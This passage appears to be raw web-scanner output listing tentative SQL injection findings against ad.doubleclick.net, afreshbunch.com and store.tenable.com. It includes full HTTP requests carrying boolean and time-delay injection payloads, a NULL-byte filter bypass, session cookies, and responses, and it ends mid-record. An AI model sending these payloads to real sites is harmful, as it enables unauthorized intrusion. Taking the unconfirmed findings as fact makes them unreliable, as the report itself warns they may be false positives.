The client parameter appears to be vulnerable to SQL injection attacks. The payloads 85094699'%20or%201%3d1--%20 and 85094699'%20or%201%3d2--%20 were each submitted in the client parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=1&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=ca-pub-406387893378091285094699'%20or%201%3d1--%20&adurl=;ord=2114915439? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303835509&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Faccountsnapcom%2Freflected-xss-cross-site-scripting-capec86-cwe79-dork-ghdb-report-example-poc.html&dt=1303817665946&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303817665999&frm=0&adk=1607234649&ga_vid=1111573264.1303817666&ga_sid=1303817666&ga_hid=1356844413&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=238&xpc=ql02NCTGR1&p=http%3A//xss.cx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
1.2. http://ad.doubleclick.net/adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://ad.doubleclick.net
Path:
/adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=1&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=ca-pub-4063878933780912&adurl=;ord=2114915439?&1%20and%201%3d1--%20=1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303835509&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Faccountsnapcom%2Freflected-xss-cross-site-scripting-capec86-cwe79-dork-ghdb-report-example-poc.html&dt=1303817665946&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303817665999&frm=0&adk=1607234649&ga_vid=1111573264.1303817666&ga_sid=1303817666&ga_hid=1356844413&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=238&xpc=ql02NCTGR1&p=http%3A//xss.cx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The ASPSESSIONIDSSTDDTRS cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ASPSESSIONIDSSTDDTRS cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Request 1
GET / HTTP/1.1 Host: afreshbunch.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB%00'; __utma=1.1546818399.1303779795.1303779795.1303779795.1; __utmb=1; __utmc=1; __utmz=1.1303779795.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.14.10.1303778640
Response 1 (redirected)
HTTP/1.1 500 Server Error Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 26 Apr 2011 01:19:50 GMT Connection: close Content-Length: 60
<html><body><h1> HTTP/1.1 Server Too Busy</h1></body></html>
Request 2
GET / HTTP/1.1 Host: afreshbunch.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB%00''; __utma=1.1546818399.1303779795.1303779795.1303779795.1; __utmb=1; __utmc=1; __utmz=1.1303779795.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.14.10.1303778640
The site_id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the site_id parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ',0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 3. The application took 99838 milliseconds to respond to the request, compared with 1055 milliseconds for the original request, indicating that the injected SQL command caused a time delay.
The database appears to be Microsoft SQL Server.
Request
GET /user/453756/theme',0,0,0)waitfor%20delay'0%3a0%3a20'--/design/AFB2011/style.css?2011425200341 HTTP/1.1 Host: afreshbunch.com Proxy-Connection: keep-alive Referer: http://afreshbunch.com/about.htm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.5.10.1303778640; site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB
Response (redirected)
HTTP/1.1 500 Server Error Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 26 Apr 2011 01:14:06 GMT Connection: close Content-Length: 60
<html><body><h1> HTTP/1.1 Server Too Busy</h1></body></html>
The cPath parameter appears to be vulnerable to SQL injection attacks. The payloads 90230064%20or%201%3d1--%20 and 90230064%20or%201%3d2--%20 were each submitted in the cPath parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /?main_page=index&cPath=190230064%20or%201%3d1--%20 HTTP/1.1 Host: store.tenable.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access / on this server.</p> </body></html>
Request 2
GET /?main_page=index&cPath=190230064%20or%201%3d2--%20 HTTP/1.1 Host: store.tenable.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7
The main_page parameter appears to be vulnerable to SQL injection attacks. The payloads 23679891'%20or%201%3d1--%20 and 23679891'%20or%201%3d2--%20 were each submitted in the main_page parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /?main_page=index23679891'%20or%201%3d1--%20&cPath=1 HTTP/1.1 Host: store.tenable.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access / on this server.</p> </body></html>
Request 2
GET /?main_page=index23679891'%20or%201%3d2--%20&cPath=1 HTTP/1.1 Host: store.tenable.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7
Response 2
HTTP/1.1 404 Not Found Date: Mon, 25 Apr 2011 23:51:55 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 21734
<!doctype html> <html lang="en" dir="ltr" lang="en"> <head> <title>Page Not Found : Tenable Store, Unified Security Monitoring</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="ProfessionalFeed Training ProfessionalFeed Renewals Perimeter Service ecommerce, open source, shop, online shopping Page Not Found" /> <meta name="description" content="Tenable Store : Page Not Found - ProfessionalFeed Training ProfessionalFeed Renewals Perimeter Service ecommerce, open source, shop, online shopping" /> <meta http-equiv="imagetoolbar" content="no" /> <meta name="author" content="Tenable Network Security" />
(function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ss ...[SNIP]...
1.8. https://store.tenable.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
https://store.tenable.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 94659222%20or%201%3d1--%20 and 94659222%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /?main_page=index&cPath=1&194659222%20or%201%3d1--%20=1 HTTP/1.1 Host: store.tenable.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access / on this server.</p> </body></html>
Request 2
GET /?main_page=index&cPath=1&194659222%20or%201%3d2--%20=1 HTTP/1.1 Host: store.tenable.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 45960039'%20or%201%3d1--%20 and 45960039'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /includes45960039'%20or%201%3d1--%20/templates/tenable/css/t.css?v=1 HTTP/1.1 Host: store.tenable.com Connection: keep-alive Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /includes45960039' or 1=1-- /templates/tenable/css/t.css on this server.</p> </body></html>
Request 2
GET /includes45960039'%20or%201%3d2--%20/templates/tenable/css/t.css?v=1 HTTP/1.1 Host: store.tenable.com Connection: keep-alive Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7
Response 2
HTTP/1.1 404 Not Found Date: Mon, 25 Apr 2011 23:48:39 GMT Server: Apache Content-Length: 253 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /includes45960039' or 1=2-- /templates/tenable/css/t.css was not found on this server.</p> </body></html>
1.10. https://store.tenable.com/includes/templates/tenable/css/t.css [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
https://store.tenable.com
Path:
/includes/templates/tenable/css/t.css
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 16156446%20or%201%3d1--%20 and 16156446%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /includes/templates/tenable/css/t.css?v=1&116156446%20or%201%3d1--%20=1 HTTP/1.1 Host: store.tenable.com Connection: keep-alive Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /includes/templates/tenable/css/t.css on this server.</p> </body></html>
Request 2
GET /includes/templates/tenable/css/t.css?v=1&116156446%20or%201%3d2--%20=1 HTTP/1.1 Host: store.tenable.com Connection: keep-alive Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7
Response 2
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 23:48:32 GMT Server: Apache Last-Modified: Fri, 14 Jan 2011 16:46:56 GMT ETag: "12ee30-caf6-2e9b8000" Accept-Ranges: bytes Content-Length: 51958 Connection: close Content-Type: text/css
/** * !! IMPORTANT !! * Please make sure that whenever changes are made to this file that it is * recompressed and saved in T.MIN.CSS as well. This file is NOT used by the * public-facing site, it is only called within the administrative environment. */ @media screen, print { /** * @section YUI Reset; * @note uncompressed available at ./uncompressed/reset.css; **/ html{color:#000;background:#FFF;}body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,code,form,fieldset,legend,input,button,textarea,p,blockquote,th,td{margin:0;padding:0;}table{border-collapse:collapse;border-spacing:0;}fieldset,img{border:0;}address,caption,cite,code,dfn,em,strong,th,var,optgroup{font-style:inherit;font-weight:inherit;}del,ins{text-decoration:none;}li{list-style:none;}caption,th{text-align:left;}h1,h2,h3,h4,h5,h6{font-size:100%;font-weight:normal;}q:before,q:after{content:'';}abbr,acronym{border:0;font-variant:normal;}sup{vertical-align:baseline;}sub{vertical-align:baseline;}legend{color:#000;}input,button,textarea,select,optgroup,option{font-family:inherit;font-size:inherit;font-style:inherit;font-weight:inherit;}input,button,textarea,select{*font-size:100%;}
The v parameter appears to be vulnerable to SQL injection attacks. The payloads 12532255%20or%201%3d1--%20 and 12532255%20or%201%3d2--%20 were each submitted in the v parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /includes/templates/tenable/css/t.css?v=112532255%20or%201%3d1--%20 HTTP/1.1 Host: store.tenable.com Connection: keep-alive Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /includes/templates/tenable/css/t.css on this server.</p> </body></html>
Request 2
GET /includes/templates/tenable/css/t.css?v=112532255%20or%201%3d2--%20 HTTP/1.1 Host: store.tenable.com Connection: keep-alive Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7
Response 2
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 23:48:10 GMT Server: Apache Last-Modified: Fri, 14 Jan 2011 16:46:56 GMT ETag: "12ee30-caf6-2e9b8000" Accept-Ranges: bytes Content-Length: 51958 Connection: close Content-Type: text/css
/** * !! IMPORTANT !! * Please make sure that whenever changes are made to this file that it is * recompressed and saved in T.MIN.CSS as well. This file is NOT used by the * public-facing site, it is only called within the administrative environment. */ @media screen, print { /** * @section YUI Reset; * @note uncompressed available at ./uncompressed/reset.css; **/ html{color:#000;background:#FFF;}body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,code,form,fieldset,legend,input,button,textarea,p,blockquote,th,td{margin:0;padding:0;}table{border-collapse:collapse;border-spacing:0;}fieldset,img{border:0;}address,caption,cite,code,dfn,em,strong,th,var,optgroup{font-style:inherit;font-weight:inherit;}del,ins{text-decoration:none;}li{list-style:none;}caption,th{text-align:left;}h1,h2,h3,h4,h5,h6{font-size:100%;font-weight:normal;}q:before,q:after{content:'';}abbr,acronym{border:0;font-variant:normal;}sup{vertical-align:baseline;}sub{vertical-align:baseline;}legend{color:#000;}input,button,textarea,select,optgroup,option{font-family:inherit;font-size:inherit;font-style:inherit;font-weight:inherit;}input,button,textarea,select{*font-size:100%;}
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 82626339'%20or%201%3d1--%20 and 82626339'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /includes82626339'%20or%201%3d1--%20/templates/tenable/img/favicon.ico HTTP/1.1 Host: store.tenable.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /includes82626339' or 1=1-- /templates/tenable/img/favicon.ico on this server.</p> </body></html>
Request 2
GET /includes82626339'%20or%201%3d2--%20/templates/tenable/img/favicon.ico HTTP/1.1 Host: store.tenable.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7
Response 2
HTTP/1.1 404 Not Found Date: Mon, 25 Apr 2011 23:49:34 GMT Server: Apache Content-Length: 259 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /includes82626339' or 1=2-- /templates/tenable/img/favicon.ico was not found on this server.</p> </body></html>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 76127428'%20or%201%3d1--%20 and 76127428'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
